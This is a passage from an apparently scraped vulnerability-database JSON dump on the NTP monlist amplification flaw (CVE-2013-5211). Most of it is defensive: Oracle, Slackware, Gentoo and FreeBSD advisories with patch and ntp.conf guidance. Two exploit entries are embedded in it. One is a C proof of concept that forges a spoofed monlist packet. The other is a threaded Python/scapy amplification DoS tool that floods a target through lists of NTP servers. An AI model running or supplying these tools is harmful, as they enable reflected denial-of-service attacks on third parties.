"NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2015-7979", "CVE-2016-1547", "CVE-2016-1548", "CVE-2016-1550", "CVE-2016-2518", "CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311", "CVE-2017-6462", "CVE-2017-6463", "CVE-2017-6464"], "modified": "2017-10-26T00:00:00", "id": "ELSA-2017-3071", "href": "http://linux.oracle.com/errata/ELSA-2017-3071.html", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-30T06:24:33", "description": "[4.2.6p5-25.0.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]\n[4.2.6p5-25]\n- don't allow spoofed packet to enable symmetric interleaved mode\n (CVE-2016-1548)\n- check mode of new source in config command (CVE-2016-2518)\n- make MAC check resilient against timing attack (CVE-2016-1550)\n[4.2.6p5-24]\n- fix crash with invalid logconfig command (CVE-2015-5194)\n- fix crash when referencing disabled statistic type (CVE-2015-5195)\n- don't hang in sntp with crafted reply (CVE-2015-5219)\n- don't crash with crafted autokey packet (CVE-2015-7691, CVE-2015-7692,\n CVE-2015-7702)\n- fix memory leak with autokey (CVE-2015-7701)\n- don't allow setting driftfile and pidfile remotely (CVE-2015-7703)\n- don't crash in ntpq with crafted packet (CVE-2015-7852)\n- check key ID in packets authenticated with symmetric key (CVE-2015-7974)\n- fix crash with reslist command (CVE-2015-7977, CVE-2015-7978)\n- don't allow spoofed packets to demobilize associations (CVE-2015-7979,\n CVE-2016-1547)\n- don't accept server/peer packets with zero origin timestamp (CVE-2015-8138)\n- fix infinite loop in ntpq/ntpdc (CVE-2015-8158)\n- fix resetting of leap status (#1242553)\n- extend rawstats log (#1242877)\n- report clock state changes related to leap seconds (#1242935)\n- allow -4/-6 on restrict lines with mask (#1304492)\n- explain synchronised state in ntpstat man page (#1309594)", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 4.0}, "published": "2016-11-09T00:00:00", "type": "oraclelinux", "title": "ntp security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2015-5194", "CVE-2015-5195", "CVE-2015-5196", "CVE-2015-5219", "CVE-2015-7691", "CVE-2015-7692", "CVE-2015-7701", "CVE-2015-7702", "CVE-2015-7703", "CVE-2015-7852", "CVE-2015-7974", "CVE-2015-7977", "CVE-2015-7978", "CVE-2015-7979", "CVE-2015-8138", "CVE-2015-8158", "CVE-2016-1547", "CVE-2016-1548", "CVE-2016-1550", "CVE-2016-2518"], "modified": "2016-11-09T00:00:00", "id": "ELSA-2016-2583", "href": "http://linux.oracle.com/errata/ELSA-2016-2583.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:36:47", "description": "New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/ntp-4.2.6p5-i486-5_slack14.1.txz: Rebuilt.\n All stable versions of NTP remain vulnerable to a remote attack where the\n "ntpdc -c monlist" command can be used to amplify network traffic as part\n of a denial of service attack. By default, Slackware is not vulnerable\n since it includes "noquery" as a default restriction. However, it is\n vulnerable if this restriction is removed. To help mitigate this flaw,\n "disable monitor" has been added to the default ntp.conf (which will disable\n the monlist command even if other queries are allowed), and the default\n restrictions have been extended to IPv6 as well.\n All users of the NTP daemon should make sure that their ntp.conf contains\n "disable monitor" to prevent misuse of the NTP service. The new ntp.conf\n file will be installed as /etc/ntp.conf.new with a package upgrade, but the\n changes will need to be merged into any existing ntp.conf file by the admin.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211\n http://www.kb.cert.org/vuls/id/348126\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.6p5-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.6p5-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.6p5-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.6p5-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.6p5-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.6p5-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.6p5-i486-3_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.6p5-x86_64-3_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.6p5-i486-5_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.6p5-x86_64-5_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.6p5-i486-5.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.6p5-x86_64-5.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n3accaa602c77da7b13489043771af46c ntp-4.2.6p5-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\ndf5a6488330ea4f272b6989dc7265187 ntp-4.2.6p5-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n54a1f268bfa1d08a998fe67a1ac72b25 ntp-4.2.6p5-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\nbfa576d25822d68e2774b2e8b2977fee ntp-4.2.6p5-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n5a098aa45264a2db66bb64437e0a5323 ntp-4.2.6p5-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\nd46a9faf04b6bb1f10da492bd2150bfe ntp-4.2.6p5-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n8cb41c56322999a0bfd77b62afdb4b78 ntp-4.2.6p5-i486-3_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n9b1fef2c9768655d6e563b51ef996cb4 ntp-4.2.6p5-x86_64-3_slack14.0.txz\n\nSlackware 14.1 package:\n45a99f84f5b8de1711f55905f2b956bb ntp-4.2.6p5-i486-5_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n09f5e6d88e4eeb3e77629bf4a35bb319 ntp-4.2.6p5-x86_64-5_slack14.1.txz\n\nSlackware -current package:\n28f145dd7fa671cd85b507ee5a73ab59 n/ntp-4.2.6p5-i486-5.txz\n\nSlackware x86_64 -current package:\nd47b61aa02c44ceb1ea634bd2dc2a7f5 n/ntp-4.2.6p5-x86_64-5.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ntp-4.2.6p5-i486-5_slack14.1.txz\n\nEnsure that your /etc/ntp.conf contains a line like this:\ndisable monitor\n\nThen, restart the NTP daemon:\n\n > sh /etc/rc.d/rc.ntpd restart", "cvss3": {}, "published": "2014-02-13T16:38:35", "type": "slackware", "title": "ntp", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-02-13T16:38:35", "id": "SSA-2014-044-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.575205", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2023-09-12T13:45:10", "description": "The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.", "cvss3": {}, "published": "2014-01-02T14:59:00", "type": "cve", "title": "CVE-2013-5211", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/o:opensuse:opensuse:11.4", "cpe:/a:ntp:ntp:4.2.7"], "id": "CVE-2013-5211", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:11.4:*:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-09-13T10:42:14", "description": "The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.", "cvss3": {}, "published": "2014-01-02T14:59:00", "type": "debiancve", "title": "CVE-2013-5211", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-02T14:59:00", "id": "DEBIANCVE:CVE-2013-5211", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5211", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:36", "description": "\nNTP ntpd monlist Query Reflection - Denial of Service", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "exploitpack", "title": "NTP ntpd monlist Query Reflection - Denial of Service", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-04-28T00:00:00", "id": "EXPLOITPACK:61264D7F584A0F774F7A3A1AE8C27DB8", "href": "", "sourceData": "/*\n * Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification\n * Date: 28/04/2014\n * Code Author: Danilo PC - <DaNotKnow@gmail.com>\n * CVE : CVE-2013-5211\n*/\n\n/* I coded this program to help other to understand how an DDoS attack amplified by NTP servers works (CVE-2013-5211)\n * I took of the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there's a lot of kiddies out there, \n * if you know how to program, making a loop or using with other tool is piece of cake. There core idea is there, just use it as you please.\n */\n\n//------------------------------------------------------------------------------------------------//\n//------------------------------------------------------------------------------------------------//\n\n\n#include <stdio.h> //For on printf function\n#include <string.h> //For memset\n#include <sys/socket.h> //Structs and Functions used for sockets operations.\n#include <stdlib.h>\t //For exit function\n#include <netinet/ip.h> //Structs for IP header\n\n//Struct for UDP Packet\nstruct udpheader{\n\tunsigned short int udp_sourcePortNumber;\n\tunsigned short int udp_destinationPortNumber;\n\tunsigned short int udp_length;\n\tunsigned short int udp_checksum;\n};\n\n// Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler\nstruct \tntpreqheader {\n\tunsigned char rm_vn_mode;\t\t/* response, more, version, mode */\n\tunsigned char auth_seq;\t\t/* key, sequence number */\n\tunsigned char implementation;\t\t/* implementation number */\n\tunsigned char request;\t\t\t/* request number */\n\tunsigned short err_nitems;\t\t/* error code/number of data items */\n\tunsigned short mbz_itemsize;\t\t/* item size */\n\tchar data[40];\t\t\t\t/* data area [32 prev](176 byte max) */\n\tunsigned long tstamp;\t\t\t/* time stamp, for authentication */\n\tunsigned int keyid;\t\t\t/* encryption key */\n\tchar mac[8]; \t\t/* (optional) 8 byte auth code */\n};\n\n\n// Calculates the checksum of the ip header.\nunsigned short csum(unsigned short *ptr,int nbytes) \n{\n register long sum;\n unsigned short oddbyte;\n register short answer;\n\n sum=0;\n while(nbytes>1) {\n sum+=*ptr++;\n nbytes-=2;\n }\n if(nbytes==1) {\n oddbyte=0;\n *((u_char*)&oddbyte)=*(u_char*)ptr;\n sum+=oddbyte;\n }\n\n sum = (sum>>16)+(sum & 0xffff);\n sum = sum + (sum>>16);\n answer=(short)~sum;\n return(answer);\n}\n\n\n//Da MAIN\n\nint main(int argc, char **argv)\n{\nint status;\t\t\t// Maintains the return values of the functions\nstruct iphdr *ip;\t\t// Pointer to ip header struct\nstruct udpheader *udp;\t\t// Pointer to udp header struct\nstruct ntpreqheader *ntp;\t// Pointer to ntp request header struct\nint sockfd;\t\t\t// Maintains the socket file descriptor\nint one = 1;\t\t\t// Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.\nstruct sockaddr_in dest;\t// Maintains the data of the destination address\nchar packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself\n\n// Parameters check\n\tif( argc != 3){\n\t\tprintf(\"Usage: ./ntpDdos [Target IP] [NTP Server IP]\\n\");\n\t\tprintf(\"Example: ./ntpDdos 1.2.3.4 127.0.0.1 \\n\");\n\t\tprintf(\"Watch it on wireshark!\\n\");\n\t\tprintf(\"Coded for education purpose only!\\n\");\n\t\texit(1);\n\t}\n\n// Create a socket and tells the kernel that we want to use udp as layer 4 protocol\n\tsockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);\n\tif (sockfd == -1){\n\t\tprintf(\"Error on initializing the socket\\n\");\n\t\texit(1);\n\t}\n\n\n\n//Sets the option IP_HDRINCL\n\tstatus = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);\n\tif (status == -1){\n printf(\"Error on setting the option HDRINCL on socket\\n\");\n exit(1);\n }\n\n\n//\"Zeroes\" all the packet stack\n\tmemset( packet, 0, sizeof(packet) );\n\n\n//Mounts the packet headers\n// [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!\n\tip = (struct iphdr *)packet;\n\tudp = (struct udpheader *) (packet + sizeof(struct iphdr) );\n\tntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );\n\n\n//Fill the IP Header\n\tip->version = 4;\t\t//IPv4\n ip->ihl = 5;\t\t\t//Size of the Ip header, minimum 5\n ip->tos = 0;\t\t\t//Type of service, the default value is 0\n ip->tot_len = sizeof(packet); //Size of the datagram\n ip->id = htons(1234); \t//LengthIdentification Number\n ip->frag_off = 0;\t\t//Flags, zero represents reserved\n ip->ttl = 255;\t \t\t//Time to Live. Maximum of 255\n ip->protocol = IPPROTO_UDP;\t//Sets the UDP as the next layer protocol\n ip->check = 0;\t \t\t//Checksum.\n ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)\n ip->daddr = inet_addr( argv[2] ); //Destination IP\n\n\t//Fills the UDP Header\n\tudp->udp_sourcePortNumber = htons( atoi( \"123\" ) ); //Source Port\n\tudp->udp_destinationPortNumber = htons(atoi(\"123\")) ; //Destination Port\n\tudp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet\n\tudp->udp_checksum = 0;\t\t\t\t //Checksum\n\n\t//Calculate the checksums\n\tip->check = csum((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header\n\n\t//Sets the destination data\n\tdest.sin_family = AF_INET;\t\t\t\t // Address Family Ipv4\n\tdest.sin_port = htons (atoi( \"123\" ) ) ; \t\t// Destination port\n\tdest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endere\u00e7o para onde se quer enviar o pacote \n\n\t//Fills the NTP header\n\t//Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST\n\t//To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the \n\t// ntp request packet and hardcoded the values for the fields to make a \"MON_GETLIST\" request packet. \n\t// To learn more, read this: http://searchcode.com/codesearch/view/451164#127\n\tntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7\n\tntp->implementation=0x03; //Sets the implementation to 3\n\tntp->request=0x2a;\t //Sets the request field to 42 ( MON_GETLIST )\n\t\t\t\t //All the other fields of the struct are zeroed\n\t\n\n\t// Sends the packets\n\tstatus = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );\n\t\tif(status <0){\n\t\t\tprintf(\"Failed to send the packets\\n\");\n\t\t\texit(1);\n\t\t}\n\n\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:38", "description": "", "cvss3": {}, "published": "2014-07-16T00:00:00", "type": "packetstorm", "title": "NTP Amplification Denial Of Service Tool", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-07-16T00:00:00", "id": "PACKETSTORM:127492", "href": "https://packetstormsecurity.com/files/127492/NTP-Amplification-Denial-Of-Service-Tool.html", "sourceData": "`#!/usr/bin/env python \nfrom scapy.all import * \nimport sys \nimport threading \nimport time \n#NTP Amp DOS attack \n#by DaRkReD \n#usage ntpdos.py <target ip> <ntpserver list> <number of threads> ex: ntpdos.py 1.2.3.4 file.txt 10 \n \n#packet sender \ndef deny(): \n#Import globals to function \nglobal ntplist \nglobal currentserver \nglobal data \nglobal target \nntpserver = ntplist[currentserver] #Get new server \ncurrentserver = currentserver + 1 #Increment for next \npacket = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #BUILD IT \nsend(packet,loop=1) #SEND IT \n \n#So I dont have to have the same stuff twice \ndef printhelp(): \nprint \"NTP Amplification DOS Attack\" \nprint \"By DaRkReD\" \nprint \"Usage ntpdos.py <target ip> <ntpserver list> <number of threads>\" \nprint \"ex: ex: ntpdos.py 1.2.3.4 file.txt 10\" \nprint \"NTP serverlist file should contain one IP per line\" \nprint \"MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS\" \nexit(0) \n \nif len(sys.argv) < 4: \nprinthelp() \n#Fetch Args \ntarget = sys.argv[1] \n \n#Help out idiots \nif target in (\"help\",\"-h\",\"h\",\"?\",\"--h\",\"--help\",\"/?\"): \nprinthelp() \n \nntpserverfile = sys.argv[2] \nnumberthreads = int(sys.argv[3]) \n#System for accepting bulk input \nntplist = [] \ncurrentserver = 0 \nwith open(ntpserverfile) as f: \nntplist = f.readlines() \n \n#Make sure we dont out of bounds \nif numberthreads > int(len(ntplist)): \nprint \"Attack Aborted: More threads than servers\" \nprint \"Next time dont create more threads than servers\" \nexit(1) \n \n#Magic Packet aka NTP v2 Monlist Packet \ndata = \"\\x17\\x00\\x03\\x2a\" + \"\\x00\" * 4 \n \n#Hold our threads \nthreads = [] \nprint \"Starting to flood: \"+ target + \" using NTP list: \" + ntpserverfile + \" With \" + str(numberthreads) + \" threads\" \nprint \"Use CTRL+C to stop attack\" \n \n#Thread spawner \nfor n in range(numberthreads): \nthread = threading.Thread(target=deny) \nthread.daemon = True \nthread.start() \n \nthreads.append(thread) \n \n#In progress! \nprint \"Sending...\" \n \n#Keep alive so ctrl+c still kills all them threads \nwhile True: \ntime.sleep(1) \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127492/ntpamp.py.txt"}], "fortinet": [{"lastseen": "2023-06-26T14:12:23", "description": "An insufficient control of network message volume (CWE-406) vulnerability in FortiAnalyzer may allow an unauthenticated remote attacker to perform NTP amplification attacks (thereby causing reflected denial of service on arbitrary targets) via sending specially crafted mode 6 queries to the FortiAnalyzer built-in NTP server. \n\n", "cvss3": {}, "published": "2020-06-22T00:00:00", "type": "fortinet", "title": "FortiAnalyzer could potentially be used in NTP amplification attacks", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2020-06-22T00:00:00", "id": "FG-IR-20-036", "href": "https://www.fortiguard.com/psirt/FG-IR-20-036", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2023-09-12T14:06:50", "description": "### Background\n\nNTP is a protocol designed to synchronize the clocks of computers over a network. The net-misc/ntp package contains the official reference implementation by the NTP Project. \n\n### Description\n\nntpd is susceptible to a reflected Denial of Service attack. Please review the CVE identifiers and references below for details. \n\n### Impact\n\nAn unauthenticated remote attacker may conduct a distributed reflective Denial of Service attack on another user via a vulnerable NTP server. \n\n### Workaround\n\nWe modified the default ntp configuration in =net-misc/ntp-4.2.6_p5-r10 and added \u201cnoquery\u201d to the default restriction which disallows anyone to query the ntpd status, including \u201cmonlist\u201d. \n\nIf you use a non-default configuration, and provide a ntp service to untrusted networks, we highly recommend you to revise your configuration to disable mode 6 and 7 queries for any untrusted (public) network. \n\nYou can always enable these queries for specific trusted networks. For more details please see the \u201cAccess Control Support\u201d chapter in the ntp.conf(5) man page. \n\n### Resolution\n\nAll NTP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/ntp-4.2.6_p5-r10\"\n \n\nNote that the updated package contains a modified default configuration only. You may need to modify your configuration further.", "cvss3": {}, "published": "2014-01-16T00:00:00", "type": "gentoo", "title": "NTP: Traffic amplification", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-16T00:00:00", "id": "GLSA-201401-08", "href": "https://security.gentoo.org/glsa/201401-08", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd_advisory": [{"lastseen": "2023-09-12T15:49:37", "description": "\\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-14:02.ntpd Security Advisory The FreeBSD Project Topic: ntpd distributed reflection Denial of Service vulnerability Category: contrib Module: ntpd Announced: 2014-01-14 Affects: All supported versions of FreeBSD. Corrected: 2014-01-14 19:04:33 UTC (stable/10, 10.0-PRERELEASE) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RELEASE) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC5-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC4-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC3-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC2-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC1-p1) 2014-01-14 19:20:41 UTC (stable/9, 9.2-STABLE) 2014-01-14 19:42:28 UTC (releng/9.2, 9.2-RELEASE-p3) 2014-01-14 19:42:28 UTC (releng/9.1, 9.1-RELEASE-p10) 2014-01-14 19:20:41 UTC (stable/8, 8.4-STABLE) 2014-01-14 19:42:28 UTC (releng/8.4, 8.4-RELEASE-p7) 2014-01-14 19:42:28 UTC (releng/8.3, 8.3-RELEASE-p14) CVE Name: CVE-2013-5211 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit . I. Background The ntpd(8) daemon is an implementation of the Network Time Protocol (NTP) used to synchronize the time of a computer system to a reference time source. II. Problem Description The ntpd(8) daemon supports a query 'monlist' which provides a history of recent NTP clients without any authentication. III. Impact An attacker can send 'monlist' queries and use that as an amplification of a reflection attack. IV. Workaround The administrator can implement one of the following possible workarounds to mitigate the attack: 1) Restrict access to ntpd(8). This can be done by adding the following lines to /etc/ntp.conf: restrict -4 default nomodify nopeer noquery notrap restrict -6 default nomodify nopeer noquery notrap restrict 127.0.0.1 restrict -6 ::1 restrict 127.127.1.0 And restart the ntpd(8) daemon. Time service is not affected and the administrator can still perform queries from local host. 2) Use IP based restrictions in ntpd(8) itself or in IP firewalls to restrict which systems can access ntpd(8). 3) Replace the base system ntpd(8) with net/ntp-devel (version 4.2.7p76 or newer) V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/SA-14:02/ntpd.patch # fetch http://security.FreeBSD.org/patches/SA-14:02/ntpd.patch.asc # gpg --verify ntpd.patch.asc b) Execute the following commands as root: # cd /usr/src # patch < /path/to/patch Recompile the operating system using buildworld and installworld as described in . Restart the ntpd(8) daemon, or reboot the system. 3) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Note that the patch would disable monitoring features of ntpd(8) daemon by default. If the feature is desirable, the administrator can choose to enable it and firewall access to ntpd(8) service. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision \\- ------------------------------------------------------------------------- stable/8/ r260641 releng/8.3/ r260647 releng/8.4/ r260647 stable/9/ r260641 releng/9.1/ r260647 releng/9.2/ r260647 stable/10/ r260639 releng/10.0/ r260641 \\- ------------------------------------------------------------------------- To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed: # svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NNNNNN with the revision number: VII. References The latest revision of this advisory is available at \\-----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJS1ZTLAAoJEO1n7NZdz2rnn7YP/2DcBtR4LAlMLqa9t8WsFVrD zrfmitYv5xZ6TUGURfQ3mhF4Xv+vSaYt5AWphBjo/Um+dZLTrX3NXJyjLWenCFZ1 vUgoeT4czdh/sWXBO+BdahswttJ6uPO0ZPeW/TpczHMrfG++r6FZtcavYj1gWUPX rQUEh3IRT5MzzcdiIdQFOpi6OeOP7hem5pNOqYwjyy4L4wrgIUetaMpvqXgi2Wa+ 